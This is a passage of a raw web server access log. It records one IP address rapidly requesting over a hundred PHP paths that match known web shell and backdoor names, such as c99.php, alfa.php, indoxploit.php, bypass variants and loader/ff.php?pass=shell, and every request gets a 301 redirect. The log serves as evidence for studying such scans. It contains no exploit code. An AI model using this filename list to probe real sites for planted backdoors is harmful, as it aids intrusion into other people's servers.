AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /3.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /404.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /403.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /4.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /406.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /5.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /666.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /6.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /500.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /7.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /777.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:55 -0400] "GET /9.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:55 -0400] "GET /a1.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:55 -0400] "GET /8.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:55 -0400] "GET /abc.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:55 -0400] "GET /about.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /al.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /administrator.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /admin.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alf.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alf4.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alfa123.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alfa.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alfanew.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alpha.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /alwso.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /anons79.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /anon.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /anonsec.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /asd.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:56 -0400] "GET /assets/css/about.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /b.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /bak.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /base.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /blog/wp-includes/fonts/dev.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /batm.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /black.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:57 -0400] "GET /blog/wp-includes/fonts/iqb.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /by.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /byp403.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /byp7.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /byp.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /bypas.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /bypass.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /c.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /c99.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /byps.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /cgi-bin/index.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:58 -0400] "GET /cgi.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /cmd.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /chosen.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /chosen.php?p= HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /con.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /compat.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /cong.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /d.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /config.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /content.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:59 -0400] "GET /css.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /db.php?u HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /dev.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /docindex.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /dropdown.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /doc.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /error.php?phpshells HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /eagle.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /e.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /exploit.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:00 -0400] "GET /evil.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /f0x.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /fg.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /f.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /fierza.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /file.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /fm.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /flame.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /filemanager.php HTTP/1.1" 301 246 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /fm1.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /foxx.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /g.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /fw.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /gecko.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:01 -0400] "GET /gel4y.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /fx.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /green.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /gelay.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /hello.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /h.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /haxor.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /i.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /id.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /hi.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /idx.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:02 -0400] "GET /if.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /indoxploit.php HTTP/1.1" 301 245 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /index/function.php HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /images/inputs.php HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /info.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /init.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /iq.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /install.php HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /inputs.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /jindex.php HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:03 -0400] "GET /j.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /k.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /js.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /kk.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /kn.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /js.php?get HTTP/1.1" 301 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /leaf.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /loader/ff.php?pass=shell HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /l.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /lf.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:04 -0400] "GET /load.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:57:05 -0400] "GET 